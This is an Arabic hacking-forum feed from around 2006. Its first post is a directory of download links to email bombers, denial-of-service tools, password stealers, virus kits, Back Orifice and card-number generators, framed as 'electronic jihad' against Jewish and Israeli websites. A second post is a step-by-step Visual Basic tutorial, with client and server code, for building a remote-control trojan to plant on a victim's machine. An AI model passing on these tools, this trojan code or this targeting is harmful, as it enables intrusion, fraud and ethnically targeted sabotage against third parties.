برنامج wwwhack<br />
التحميل<br />
<a href="http://faisalm.50megs.com/download/hack/wwwhack.zip" target="_blank">http://faisalm.50megs.com/download/hack/wwwhack.zip</a><br />
الشرح1<br />
<a href="http://aljar7.4t.com/whack1.htm" target="_blank">http://aljar7.4t.com/whack1.htm</a><br />
الشرح2<br />
<a href="http://aljar7.4t.com/whack2.htm" target="_blank">http://aljar7.4t.com/whack2.htm</a><br />
<br />
برنامج WebCracker4.0<br />
التحميل<br />
<a href="http://www.haqerz.com/files/anti-le...ebCrack40.crack" target="_blank">http://www.haqerz.com/files/anti-le...ebCrack40.crack</a><br />
<br />
الشرح<br />
<a href="http://www.geocities.com/arabhacker2000/webcracker.htm" target="_blank">http://www.geocities.com/arabhacker2000/webcracker.htm</a><br />
<br />
<br />
برنامج Brutus<br />
التحميل<br />
<a href="http://geocities.com/kaser01/brutus.jpg" target="_blank">http://geocities.com/kaser01/brutus.jpg</a><br />
الشرح<br />
<a href="http://www.ahliz.net/vb/showthread....60&amp;pagenumber=1" target="_blank">http://www.ahliz.net/vb/showthread....60&amp;pagenumber=1</a><br />
<br />
برنامج Unsecure2.1<br />
التحميل<br />
<a href="http://packetstorm.securify.com/Cra...NT/uns12exe.zip" target="_blank">http://packetstorm.securify.com/Cra...NT/uns12exe.zip</a><br />
<br />
الشرح<br />
<a href="http://aljar7.4t.com/uns.htm" target="_blank">http://aljar7.4t.com/uns.htm</a><br />
برامج خاصة بالمواقع تجدها هنا<br />
<a href="http://jehad.itgo.com/web.htm" target="_blank">http://jehad.itgo.com/web.htm</a><br />
<br />
<br />
<br />
<br />
4ـ][][ضرب الايميل][][<br />
<br />
طرق تدمير البريد تجدها هنا<br />
<a href="http://www.geocities.com/eljehad/hackmail.htm" target="_blank">http://www.geocities.com/eljehad/hackmail.htm</a><br />
<br />
طرق تدمير البريد مع البرنامج وبالعربي<br />
<a href="http://www.geocities.com/ala_kifk/drq_mail.htm" target="_blank">http://www.geocities.com/ala_kifk/drq_mail.htm</a><br />
<br />
برنامج Kaboom<br />
<a href="http://mypage.ayna.com/devil2k/kaboom30.zip" target="_blank">http://mypage.ayna.com/devil2k/kaboom30.zip</a><br />
<br />
برنامج Euthan<br />
<a href="http://mypage.ayna.com/devil2k/euthan15.zip" target="_blank">http://mypage.ayna.com/devil2k/euthan15.zip</a><br />
<br />
برنامج aenima<br />
<a href="http://www.arabshacker.com/aenima.zip" target="_blank">http://www.arabshacker.com/aenima.zip</a><br />
<br />
برنامج upyours4beta3<br />
<a href="http://members.nbci.com/hacknowledge/upyours4beta3.zip" target="_blank">http://members.nbci.com/hacknowledge/upyours4beta3.zip</a><br />
<br />
برنامج sneaky Mail<br />
<a href="http://members.nbci.com/hacknowledge/sneaky.zip" target="_blank">http://members.nbci.com/hacknowledge/sneaky.zip</a><br />
<br />
5ـ][][ضرب المواقع ][][<br />
<br />
كيف تدمر سيرفرات المواقع اليهودية؟؟ هنا الجواب<br />
<a href="http://www.home4arab.com/members//i...ews_servers.htm" target="_blank">http://www.home4arab.com/members//i...ews_servers.htm</a><br />
<br />
<br />
برنامج الدرة الحربي للهجوم على المواقع الإسرائيلية ،،<br />
تجده هنا مع الشرح<br />
<a href="http://www.yaroun.8m.com/dorrah.htm" target="_blank">http://www.yaroun.8m.com/dorrah.htm</a><br />
<br />
طريقة من طرق تدمير المواقع<br />
<br />
افتح الدوس ومن ثم اكتب هذا الامر على سبيل المثال<br />
<br />
ping <a href="http://xxxxxxx" target="_blank">http://xxxxxxx</a><br />
<br />
بدل الأكسات اكتب اسم الموقع<br />
<br />
تدمير المواقع بدون برامج للتدمير ،، هنا طريقة الشرح<br />
<a href="http://www.geocities.com/ala_kifk/drq_battle.htm" target="_blank">http://www.geocities.com/ala_kifk/drq_battle.htm</a><br />
<br />
<br />
6ـ][][سرقة الارقام السرية - الباسورد][][<br />
<br />
BiosHackيخترق عدة انواع من البيوس<br />
<a href="http://paragon.revoluti0n.org/Bios/bioshack.zip" target="_blank">http://paragon.revoluti0n.org/Bios/bioshack.zip</a><br />
<br />
ARJ لكسر الـ<br />
<a href="http://www.hackpalace.com/cracking/...swords/arj1.zip" target="_blank">http://www.hackpalace.com/cracking/...swords/arj1.zip</a><br />
<br />
<br />
FTP للبحث فى الشبكة عن<br />
<a href="http://*******club.com/km/files/hfi...check-0_31.perl" target="_blank">http://*******club.com/km/files/hfi...check-0_31.perl</a><br />
<br />
<br />
لاظهار ما تحت النجوم<br />
<a href="http://paragon.revoluti0n.org/PassCrack/passthief.exe" target="_blank">http://paragon.revoluti0n.org/PassCrack/passthief.exe</a><br />
<br />
7ـ][][قوائم عد - وورد لست][][<br />
<br />
تستعمل فى بعض المواقع<br />
<a href="http://paragon.revoluti0n.org/PassCrack/adult2lst.zip" target="_blank">http://paragon.revoluti0n.org/PassCrack/adult2lst.zip</a><br />
<br />
اسماء ذكور<br />
<a href="http://paragon.revoluti0n.org/PassCrack/male-names.zip" target="_blank">http://paragon.revoluti0n.org/PassCrack/male-names.zip</a><br />
<br />
<br />
اسماء اناث<br />
<a href="http://paragon.revoluti0n.org/PassC...emale-names.zip" target="_blank">http://paragon.revoluti0n.org/PassC...emale-names.zip</a><br />
<br />
<br />
لصناعة قائمة<br />
<a href="http://*******club.com/km/files/pas...ts/dictmake.zip" target="_blank">http://*******club.com/km/files/pas...ts/dictmake.zip</a><br />
<br />
<br />
لارقام الديجيتال<br />
<a href="http://paragon.revoluti0n.org/PassCrack/4digits.zip" target="_blank">http://paragon.revoluti0n.org/PassCrack/4digits.zip</a><br />
<br />
<br />
8ـ ][][ الفيروسات][][<br />
<br />
،،، أدوات تصنيع الفيروسات ،،،إخطر الفيروسات والكثير<br />
الكثير تجدها هنا // اخواني اخواتي ارجو اخذ الحذر عند<br />
تنزيلها لانها قد تعطب الماذر بورد///<br />
<br />
<a href="http://jehad.itgo.com/vairuses.htm" target="_blank">http://jehad.itgo.com/vairuses.htm</a><br />
<br />
ملف يحتوي على 130 فيروس<br />
<a href="http://www.vbzor.4t.com/w6/130vs.zip" target="_blank">http://www.vbzor.4t.com/w6/130vs.zip</a><br />
<br />
برنامج لصناعة فيروسات (الديدان) مع شرح له<br />
التحميل<br />
<a href="http://www.virtue.nu/kaser/vbswg2.zip" target="_blank">http://www.virtue.nu/kaser/vbswg2.zip</a><br />
الشرح<br />
<a href="http://ahliz.net/vb/showthread.php3?threadid=5941" target="_blank">http://ahliz.net/vb/showthread.php3?threadid=5941</a><br />
<br />
<br />
فيروسات خطيرة ادخل هنا ،، وربنا يستر<br />
<a href="http://aljar7.4t.com/virus.htm" target="_blank">http://aljar7.4t.com/virus.htm</a><br />
<br />
<br />
<br />
9ـ ][][سلسلة تعليم الهاكرز][][<br />
<br />
<br />
مكتبة تحتوى على كتب للتعليم والشرح<br />
<a href="http://e-jehad.8m.com/Library/index.html" target="_blank">http://e-jehad.8m.com/Library/index.html</a><br />
تحتوي هذه المكتبة على سلسلة من الدروس و الكتب المتعلقة<br />
بتعليم اختراق المواقع و البريد الإلكترني و الأجهزة ..<br />
القسم قيد التطوير و التحديث .. نتمنى لكم حسن القراءة و<br />
التعلم .. كما نسألكم الدعاء لكتاب و ناشري الدروس .. و<br />
الله الموفق .<br />
<br />
ملاحظة :- يفضل تنزيل الكتب و الدروس بدون برامج التنزيل<br />
، لأنها قد لا تعمل .<br />
<br />
<br />
وهنا عشرات الدروس وبالعربية ،، رائعة<br />
<a href="http://www.geocities.com/ala_kifk/dros.htm" target="_blank">http://www.geocities.com/ala_kifk/dros.htm</a><br />
<br />
دروس بالعربية لأختراق المواقع تجدها هنا<br />
<a href="http://www.geocities.com/eljehad1/learn.htm" target="_blank">http://www.geocities.com/eljehad1/learn.htm</a><br />
<br />
دروس بالعربية لأختراق الأجهزة تجدها هنا<br />
<a href="http://www.geocities.com/eljehad1/learn.htm" target="_blank">http://www.geocities.com/eljehad1/learn.htm</a><br />
<br />
دروس بالعربية لتدمير المواقع تجدها هنا<br />
<a href="http://www.geocities.com/eljehad1/learn.htm" target="_blank">http://www.geocities.com/eljehad1/learn.htm</a><br />
<br />
وهنا مجموعة دروس باللغة الأنجليزية<br />
<a href="http://www.geocities.com/eljehad1/learn.htm" target="_blank">http://www.geocities.com/eljehad1/learn.htm</a><br />
<br />
<br />
][][انواع الهاكرز][][<br />
<a href="http://aljar7.4t.com/hinfo.htm" target="_blank">http://aljar7.4t.com/hinfo.htm</a><br />
<br />
بعض التوضيحات والدروس<br />
<br />
ماالذي تستطيع فعله لكي تجاهد الكترونيا ؟<br />
<a href="http://e-jehad.8m.com/Tips/e-jehad_HowTo.htm" target="_blank">http://e-jehad.8m.com/Tips/e-jehad_HowTo.htm</a><br />
<br />
الاختراق بدون سيرفر - باتش<br />
<a href="http://www.ahliz.net/vb/showthread....41&amp;pagenumber=1" target="_blank">http://www.ahliz.net/vb/showthread....41&amp;pagenumber=1</a><br />
<br />
<br />
ازالة تروجان برامج الهكرز<br />
<a href="http://www.ahliz.net/vb/showthread.php3?threadid=1196" target="_blank">http://www.ahliz.net/vb/showthread.php3?threadid=1196</a><br />
<br />
Nuke - نيوك<br />
<a href="http://www.ahliz.net/vb/showthread....30&amp;pagenumber=1" target="_blank">http://www.ahliz.net/vb/showthread....30&amp;pagenumber=1</a><br />
<br />
<br />
10ـ][][برامج منوعة][][<br />
<br />
&quot; برامج هاكينج عربية &quot; بالاضافة إلى برنامج المجاهد الألكتروني تجدها هنا<br />
<a href="http://e-jehad.8m.com/Hack/ArProgz/index.html" target="_blank">http://e-jehad.8m.com/Hack/ArProgz/index.html</a><br />
<br />
صنع أرقام الفيزا<br />
<a href="http://www.geocities.com/ala_kifk/p...ogrem_visia.htm" target="_blank">http://www.geocities.com/ala_kifk/p...ogrem_visia.htm</a><br />
<br />
برنامج مجاهدين النت ، برنامج عربي ،، وصلات التحميل في الأسفل<br />
<br />
<a href="http://mypage.ayna.com/drmmm/mojahdin.zip" target="_blank">http://mypage.ayna.com/drmmm/mojahdin.zip</a><br />
<br />
<a href="http://mypage.ayna.com/drmmm/mojahdin.exe" target="_blank">http://mypage.ayna.com/drmmm/mojahdin.exe</a><br />
<br />
<a href="http://hrj.topcities.com/txt/program/MojahdinAlnet.zip" target="_blank">http://hrj.topcities.com/txt/program/MojahdinAlnet.zip</a><br />
<br />
البرنامج لا يحتاج الى شرح فهو عربي كامل وما عليك الى ان تفتح البرنامج <br />
ثم <br />
تذهب الى قسم<br />
(تدمير المواقع) وتنقر على كلمة (دمر الموقع)<br />
يجب فتح اكثر من نافذة من البرنامج من 5الى10 نوافذ اي قم بتشغيل البرنامج <br />
والنقر على<br />
ايقونتة اكثر من 5 مرات ثم قم بالذهاب الى قسم تدمير المواقع وانقر دمر <br />
الموقع <br />
في جميع<br />
النوافذ التي فتحتها (عملية تكرار)<br />
----------------------------------------------------------------<br />
برنامج البوم بار<br />
-----------------------<br />
2- http bomber<br />
وصلات التحميل :<br />
<a href="http://www.geocities.com/eljehadfiles/bomber.zip" target="_blank">http://www.geocities.com/eljehadfiles/bomber.zip</a><br />
<br />
<a href="http://www.geocities.com/hagamat2002/bomber.zip" target="_blank">www.geocities.com/hagamat2002/bomber.zip</a><br />
<br />
ww.geocities.com/eljehad1/bomber.zip<br />
<br />
<a href="http://www.geocities.com/eljehad/site/bomber.zip" target="_blank">www.geocities.com/eljehad/site/bomber.zip</a><br />
<br />
المزيد من المعلومات <a href="http://hrj.topcities.com/hrj2.htm" target="_blank">http://hrj.topcities.com/hrj2.htm</a><br />
<br />
شرح البرنامج <a href="http://www.geocities.com/eljehad/exhtt.htm" target="_blank">http://www.geocities.com/eljehad/exhtt.htm</a> او<br />
<a href="http://alkuds.tripod.com/boom.htm" target="_blank">http://alkuds.tripod.com/boom.htm</a><br />
---------------------------------------------------------------------------------------<br />
3- win smurf<br />
وصلات التحميل :<br />
<a href="http://www.geocities.com/eljehadfiles/smurf.zip" target="_blank">http://www.geocities.com/eljehadfiles/smurf.zip</a><br />
<br />
mypage.ayna.com/lnt/winsmurf.zip<br />
<br />
<a href="http://www.geocities.com/hagamat2002/smurf.zip" target="_blank">www.geocities.com/hagamat2002/smurf.zip</a><br />
<br />
<a href="http://www.geocities.com/eljehad/site/smurf.zip" target="_blank">www.geocities.com/eljehad/site/smurf.zip</a><br />
<br />
شرح البرنامج : <a href="http://www.home4arab.com/members/is...er6/roor/ws.htm" target="_blank">http://www.home4arab.com/members/is...er6/roor/ws.htm</a> او<br />
<a href="http://www.geocities.com/eljehad/exw.htm" target="_blank">http://www.geocities.com/eljehad/exw.htm</a><br />
<br />
<br />
<br />
<a href="http://aljar7.4t.com/hpc.htm" target="_blank">http://aljar7.4t.com/hpc.htm</a><br />
<br />
برامج ][][BACK ORIFICE][][<br />
<br />
<a href="http://aljar7.4t.com/hpc.htm" target="_blank">http://aljar7.4t.com/hpc.htm</a><br />
<br />
<br />
<br />
11ـ ][][ كيف تحمي نفسك من الأختراق][][<br />
<br />
كيف تتم عملية الإختراق والحماية منه<br />
<a href="http://www.geocities.com/ala_kifk/drs.htm" target="_blank">http://www.geocities.com/ala_kifk/drs.htm</a><br />
<br />
كيف تتخلص من الباتش<br />
<a href="http://www.geocities.com/ala_kifk/patch.htm" target="_blank">http://www.geocities.com/ala_kifk/patch.htm</a><br />
<br />
أرسل رسالة مجهولة المصدر<br />
<a href="http://www.pointofmail.com/sendnow/" target="_blank">http://www.pointofmail.com/sendnow/</a><br />
<br />
<br />
<br />
سريل نمبرات لبرامج مايكروسوفت الشهيرة<br />
تجدها هنا<br />
<a href="http://aljar7.4t.com/info.htm" target="_blank">http://aljar7.4t.com/info.htm</a><br />
<br />
موقع لجمع الهكرز لصد اليهود<br />
<a href="http://www.geocities.com/ala_kifk/" target="_blank">http://www.geocities.com/ala_kifk/</a><br />
<br />
<br />
منتدى الكتائب//<br />
<a href="http://www.alrakiza.com/ForumList.asp?UserNo=9399" target="_blank">http://www.alrakiza.com/ForumList.asp?UserNo=9399</a><br />
<br />
<br />
<br />
كل البرامج التي يحتاجها الهكر<br />
<a href="http://www.geocities.com/kfn99/hack.htm" target="_blank">http://www.geocities.com/kfn99/hack.htm</a><br />
<br />
وهنا كذلك تجد البرامج بترتيب ابجدي حسب اسم البرنامج<br />
<a href="http://aljar7.4t.com/Trojany.htm" target="_blank">http://aljar7.4t.com/Trojany.htm</a><br />
<br />
قمت بجمع المواد السابقة من هذه المواقع :ــ<br />
<br />
سأكتبها لاحقا ،، لأن منها ما هو تحت التطوير <br />
<br />
<br />
<br />
الخلاصة // انما الأعمال بالنيات وأنما لكل امراء ما نوى …<br />
<br />
خلاصة الخلاصة // لا تنسونا من صالح دعاكم ، والأهم اخواننا الاسرى <br />
<br />
.<br />
<br />
<br />
<br />
<br />
كود فيروس الحب ،،، كن حذرا من نسخه للجهاز ،،<br />
<br />
<a href="http://aljar7.4t.com/virus.htm" target="_blank">http://aljar7.4t.com/virus.htm</a><br />
<br />
منقول من موقع الإرهاب الإسلامي للأخ صقر الكتائب <br />
<a href="http://www.erhap.com/vb" target="_blank">http://www.erhap.com/vb</a><br />
<br />
<br />
<a href="http://www.erhap.com/vb/showthread.php?threadid=1771" target="_blank">http://www.erhap.com/vb/showthread.php?threadid=1771</a></div>

]]></content:encoded>
			<category domain="https://kwety.net/vb/forumdisplay.php?f=61">منتدى الحماية و الهاكرز</category>
			<dc:creator>ssamad2006</dc:creator>
			<guid isPermaLink="true">https://kwety.net/vb/showthread.php?t=29548</guid>
		</item>
		<item>
			<title>اصنع برنامج هاكر بنفسك</title>
			<link>https://kwety.net/vb/showthread.php?t=29462&amp;goto=newpost</link>
			<pubDate>Mon, 04 Sep 2006 13:12:15 GMT</pubDate>
			<description><![CDATA[[FRAME="11 10"][FRAME="2 80"]صمم برنامج هكر بنفسك



سوف نتحدث إن شاء الله عن فكرة برمجة برامج الاختراق الشهيرة وكيف تتم برمجتها وتشغيلها ثم سوف نقوم بعمل برنامج بالفيجوال بيسك وذلك لتوضيح الموضوع واستيعابه بشكل أفضل....
حسناً . . لنبدأ الآن بشرح تفاصيل الموضوع وعلى بركة الله:
تتكون هذه البرامج كما هو معروف من جزئين أو برنامجين يسمى الأول بملف العميل والآخر ملف الخادم
1-كيفية الاتصال بين الملفين عبر الانترنت
يتم الاتصال بين الملفين العميل والخادم باستخدام بروتوكول tcp/ip

حيث يتم الاتصال بين الملفين العميل والخادم بمعرفة رقم الايبي ورقم المنفذ للبرنامج الخادم على جهاز الضحية

بالنسبة لرقم الايبي للخادم فهو رقم الايبي الخاص بجهاز الضحية عند دخوله على شبكة الانترنت

أما بالنسبة لرقم المنفذ فيتم تحديده برمجياً أثناء عمل البرنامج ولا يمكن تعديله إذا تم وضعه في جهاز الضحية وهو رقم يتراوح بين 1 إلى 65535 تقريباً
وإذا اضطر الأمر لتعديل رقم المنفذ فيجب زرع نسخة جديدة من ملف الخادم في جهاز الضحية مرة أخرى بعد التعديل
عندما يبدأ برنامج الخادم بالعمل عند تشغيله يقوم بعمل خط اتصال وينتظر أي طلب اتصال قادم من الانترنت

في هذه الحالة يقوم الشخص الذي يملك البرنامج العميل ويعرف رقم الايبي ورقم المنفذ الصحيح بالخادم بعمل اتصال مع الخادم ويكتمل الاتصال بين الجهازين بعد ذلك يبدأ برنامج العميل بإرسال الأوامر ويقوم الخادم باستقبال هذه الأوامر وتنفيذ المطلوب منه ثم يقوم بإرسال نتائج الأوامر مرة أخرى إلى العميل
هذه هي الفكرة ببساطة شديدة أرجو أن تكون واضحة للجميع

2-خطوات عمل برنامج بالفيجوال بيسك للتجسس .
برنامج العميل
كما ذكرنا بخصوص العميل فهو الذي يتحكم بالعملية كلها وهو الذي يرسل الأوامر للبرنامج الخادم وسوف نقوم الآن بشرح خطوات تنفيذ برنامج عميل

الخطوة الأولى : معرفة رقم الايبي ورقم المنفذ للبرنامج الخادم وإجراء الاتصال 

الخطوة الثانية : ينتظر البرنامج السماح بالاتصال من البرنامج الخادم ثم يتم الاتصال بين الجهازين 

الخطوة الثالثة : يقوم البرنامج بإرسال الأوامر للبرنامج الخادم والذي بدوره يقوم بالرد بالمعلومات المطلوبة .

برنامج الخادم

يقوم هذا البرنامج بعمل اتصال بالانترنت وينتظر أي طلب اتصال معه وإذا قام برنامج العميل بكتابة رقم الايبي ورقم المنفذ الصحيح فانه يتم الاتصال بين الطرفين ويبدأ البرنامج الخادم باستقبال الأوامر من البرنامج العميل المتصل به وينفذ ما هو مطلوب منه على جهاز الضحية مثل تنفيذ بعض الأعمال التخريبية أو قراءة معلومات خاصة وإرسالها للبرنامج العميل.
سنقوم الآن بتصميم برنامج صغير لتوضيح فكرة إرسال الأوامر إلى البرنامج الخادم واستقبال البرنامج الخادم لهذه الأوامر وتنفيذها

البرنامج كما ذكرنا سابقا يتكون من جزئين برنامج عميل وبرنامج خادم

.....................
تصميم البرنامج العميل
أولا . . يتم إدراج أداة MS WINSOCK للمشروع ويتم تغيير اسم الأداة إلى wskclient 

ثانياً . . يتم إدراج TIMER 

ثالثاً . . يتم وضع أزارير لعملية الاتصال وقطع الاتصال 

رابعاً . . يتم ادراج 2 مربع نص لكتابة رقم الايبي ورقم المنفذ srvrip.Text srvrport.Text 

خامساً . . يتم وضع أزارير للأوامر المراد إرسالها للبرنامج الخادم 
كتابة شيفرة ( كود ) البرنامج العميل [Client]

يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع

1. إجراء عملية الاتصال مع الخادم wskclient.Connect srvrip.Text, srvrport.Text

2. عملية إرسال الأوامر إلى البرنامج الخادم "wskclient.SendData "openCD

3. مراقبة حالة الاتصال wskclient.State = 0 
أهم القيم المستخدمة في مراقبة حالة الاتصال

0 " لا يوجد اتصال "

7 " تم الاتصال "

8 " قام الخادم بقطع الاتصال "

9 " خطأ في الاتصال "

تصميم البرنامج الخادم

أولاً . . إدراج أداة MS WINSOCK للمشروع 

ثانياً . . كتابة الكود للبرنامج الخادم مع ملاحظة انه تم تعيين رقم المنفذ (2000) للبرنامج ويمكن تغييره في الكود لأي رقم آخر من 1 - 65535 

ثالثاً . . تصميم البرنامج ليعمل تلقائياً بعد تشغيله 
كتابة شيفرة ( كود ) البرنامج الخادم [Server]

يحتوي الكود على العديد من الإجراءات والأوامر ولكن سأذكر هنا الأسطر الأساسية والتي تمثل صلب عمل البرنامج فقط وذلك من أجل استيعاب الموضوع بشكل الأفضل أما تفاصيل الشيفرة الكاملة فيمكنكم قراءتها من البرنامج بعد تحميله من الوصلة المذكورة في نهاية الموضوع

1. تحديد منفذ الاتصال wskServer.LocalPort = 2000 

2. إجراء عملية الاتصال wskServer.Listen

3. قبول طلب البرنامج العميل بالاتصال مع البرنامج الخادم 

Private Sub wskServer_ConnectionRequest(ByVal requestID As Long)

If wskServer.State <> sckClosed Then

wskServer.Close

wskServer.Accept requestID

End Sub


عملية استقبال الأوامر من البرنامج العميل ( يتم تعريف متغير يقوم باستقبال الأوامر من العميل )

Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)

Dim command As String

wskServer.GetData command

End Sub


الحين نصممه خطوه بخطوه:
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
هذا البرنامج يمثل برنامج العميل
بستخدام تقنية tcp/ip
----------------------------------------------------------------------------------
----------------------------------------------------------------------------------
الحين انشئ زر واسمه اتصال
اوكتب هذا الكود
Private Sub Command1_Click()
wskclient.Close
'يجب التأكد من أن الإتصال مغلق قبل عمل إتصال جديد
If srvrip.Text = "" Then
MsgBox "IP يجب كتابة رقم"
Exit Sub
End If
If srvrport.Text = "" Then
MsgBox "يجب كتابة رقم المنفذ"
' يجب كتابة رقم منفذ
Exit Sub
End If
If srvrport.Text > 65535 Then
MsgBox "رقم المنفذ بين 1 - 65535"
' يجب التأكد من رقم المنفذ الصحيح
Text2.Text = ""
Exit Sub
End If
wskclient.Connect srvrip.Text, srvrport.Text
'هذا السطر يمثل عملية الإتصال بالخادم
'(Port)ورقم المنفذIP يتم الإتصال بالخادم عن طريق تحديد رقم
'عند الضغط على زر "إتصال" يتم إجراء الإتصال
Command1.Enabled = False
'تعطيل زر "اتصال" عند اجراء الاتصال
End Sub

---------------------------------------------------------
---------------------------------------------------------
انشئ رز واسمه انهاء الاتصال
واكتب هذا الكود
Private Sub Command2_Click()
wskclient.Close
' "يتم إغلاق الإتصال عند الضغط على زر "انهاء الاتصال
Command1.Enabled = True
'تمكين الزر "اتصال" عند قطع الاتصال
End Sub
----------------------------------------------------------
----------------------------------------------------------
انشئ زر واسمه فتح سواقه الليزر
واكتب هذا الكود
Private Sub Command3_Click()
On Error Resume Next
wskclient.SendData "openCD"
End Sub
---------------------------------------
---------------------------------------
انشئ زر واسمه اغلاق سواقه الليزر
واكتب هذا الكود
Private Sub Command4_Click()
On Error Resume Next
wskclient.SendData "closeCD"
End Sub
----------------------------------------
----------------------------------------
انشئ زر واسمه اخفاء ايقونات سطح المكتب
واكتب هذا الكود
Private Sub Command5_Click()
On Error Resume Next
wskclient.SendData "hideDESKTOP"
End Sub
-------------------------------------
--------------------------------------
انشئ زر واسمه اضهار ايقونات سطح المكتب
واكتب هذا الكود
Private Sub Command6_Click()
On Error Resume Next
wskclient.SendData "showDESKTOP"
End Sub
--------------------------------------------
--------------------------------------------
انشئ زر واسمه اخفاء زر ابداء
واكتب هذا الكود
Private Sub Command8_Click()
On Error Resume Next
wskclient.SendData "hideSTART"
End Sub
--------------------------------------------
--------------------------------------------
انشئ زر واسمه اضهار زر ابداء
واكتب هذا الامر
Private Sub Command9_Click()
On Error Resume Next
wskclient.SendData "showSTART"
End Sub
------------------------------------------
-----------------------------------------
انشئ زر واسمه اخفاء شريط المهام
واكتب هذا الكود
Private Sub Command10_Click()
On Error Resume Next
wskclient.SendData "hideTASKBAR"
End Sub
-----------------------------------------------
-----------------------------------------------
انشئ زر واسمه اضهار شريط المهام
واكتب هذا الكود
Private Sub Command11_Click()
On Error Resume Next
wskclient.SendData "showTASKBAR"
End Sub
----------------------------------------------
----------------------------------------------
الحين انشئ fram وذللك من شريط الادوات من الفيجوال بيسك
واسمهه لوحة الاتصال وضح زر الاتصال وزر انهاء الاتصال
---------------------------------------------------------------------
الحين انشئ تايمر وضعه على لوحة الاتصال التي صنعناها من قائمة fram
اوكتب هذا الكود فيه
Private Sub Timer1_Timer()
If wskclient.State = 0 Then status.Caption = "لايوجد إتصال"
If wskclient.State = 6 Then status.Caption = "جاري الإتصال"
If wskclient.State = 7 Then status.Caption = "تم الإتصال مع الخادم"
If wskclient.State = 8 Then status.Caption = "قام الخادم بقطع الإتصال"
If wskclient.State = 9 Then status.Caption = "خطأ في الإتصال"
'توجد 9 مراحل لإجراء عملية الإتصال بين عميل وخادم
If wskclient.State <> sckConnected Then
status.Caption = "لايوجد إتصال"
End If
End Sub
-------------------------------
------------------------------
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي
----------------------------------
----------------------------------
الحين انشئ label وذلك من شريط الادوات في الفيجوال بيسك وسمه
ip
-----------------------------
-----------------------------
الحين انشئ text box وضعها امام label الذي سميناه ip
------------------------------
-----------------------------
الحين انشئ label وسمه port 
-------------------------------------
الحين انشئ text box وضعها امام label الي سميناه port
--------------------------------------
الحين انشئ label واتركه فارغا وضعه اسفل الفورم
------------------------------------------------------------------
------------------------------------------------------------------
------------------------------------------------------------------
الحين نكتب برنامج الخادم
انشئ فورم جديد واكتب هذا الكود فيه
Private Sub Form_Load()
'wskServer اسم اداة الوينسوكت في هذا البرنامج
wskServer.LocalPort = 2003
' تعيين منفذ للخادم
wskServer.Listen
' بدء تشغيل الخادم
TaskBarHwnd = FindWindow("Shell_traywnd", "")
' يقوم البرنامج بتحديد تعريف شريط المهام
End Sub
---------------------------------------
---------------------------------------
الحين انشئ wskclient وذللك عن طريق الضغط على زر كنترول من حرف تي وسوف تضهر لك قائمه اختار منها microsoft winsock control 6.0 واضغط اوكي واكتب هذا الكود فيهPrivate Sub 
Private Sub wskServer_ConnectionRequest(ByVal requestID As Long)
If wskServer.State <> sckClosed Then _
wskServer.Close
wskServer.Accept requestID
' قبول طلب الاتصال
End Sub

'==== هذا الإجراء يمثل عملية استقبال الاوامر من البرنامج العميل ====
Private Sub wskServer_DataArrival(ByVal bytesTotal As Long)
Dim command As String
'يجب تعريف المتغير الذي سوف يستقبل البيانات القادمة من العميل
wskServer.GetData command
'يمثل هذا السطر استقبال المتغير للاوامر القادمة من العميل

Select Case command ' تحديد الأمر القادم من البرنامج العميل
Case "openCD" ' اذا تم اختيار امر فتح سواقة الليزر يتم تنفيذ الاجراء التالي
CDOpen
Case "closeCD"
CDClose ' اذا تم اختيار امر اغلاق سواقة الليزر يتم تنفيذ الاجراء التالي
Case "hideDESKTOP" ' اذا تم اختيار امر اخفاء ايقونات سطح المكتب يتم تنفيذ الاجراء التالي
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
Call ShowWindow(SysListView&, SW_HIDE)
Case "showDESKTOP" ' اذا تم اختيار امر اظهار ايقونات سطح المكتب يتم تنفيذ الاجراء التالي
Progman& = FindWindow("Progman", vbNullString)
SHELLDLLDefView& = FindWindowEx(Progman&, 0&, "SHELLDLL_DefView", vbNullString)
SysListView& = FindWindowEx(SHELLDLLDefView&, 0&, "SysListView32", vbNullString)
Call ShowWindow(SysListView&, SW_SHOW)
Case "hideSTART" ' اذا تم اختيار امر اخفاء زر ابدأ يتم تنفيذ الاجراء التالي
HideStartButton
Case "showSTART" ' اذا تم اختيار امر اظهار زر ابدأ يتم تنفيذ الاجراء التالي
ShowStartButton
Case "hideTASKBAR" ' اذا تم اختيار امر اخفاء شريط المهام يتم تنفيذ الاجراء التالي
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_HIDEWINDOW)
Case "showTASKBAR" ' اذا تم اختيار امر اظهار شريط المهام يتم تنفيذ الاجراء التالي
Call SetWindowPos(TaskBarHwnd, 0&, 0&, 0&, 0&, 0&, SWP_SHOWWINDOW)
End Select

End Sub

--------------------------
---------------------------
الحين انشئ label وسمه الي تبي تسميه واكتب الي تبي تكتب فيه انشالله تسميه بوكيمون
---------------------------------------------
----------------------------------------------
الحين انشئ موديل واكتب هذا الكود فيها

' API CALLS
'مجموعة من الدالات التي تختص بتنفيذ الأوامر الخاصة بالخادم

Public Declare Function mciSendString Lib "winmm.dll" Alias "mciSendStringA" (ByVal lpstrCommand As String, ByVal lpstrReturnString As String, ByVal uReturnLength As Long, ByVal hwndCallback As Long) As Long
Public Declare Function ShowWindow Lib "user32" (ByVal hwnd As Long, ByVal nCmdShow As Long) As Long
Public Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
Public Declare Function FindWindowEx Lib "user32" Alias "FindWindowExA" (ByVal hWnd1 As Long, ByVal hWnd2 As Long, ByVal lpsz1 As String, ByVal lpsz2 As String) As Long
Public Declare Function SetWindowPos Lib "user32" (ByVal hwnd As Long, ByVal hWndInsertAfter As Long, ByVal x As Long, ByVal y As Long, ByVal cx As Long, ByVal cy As Long, ByVal wFlags As Long) As Long

Public Const SW_HIDE = 0
Public Const SW_SHOW = 5

Const SWP_HIDEWINDOW = &H80
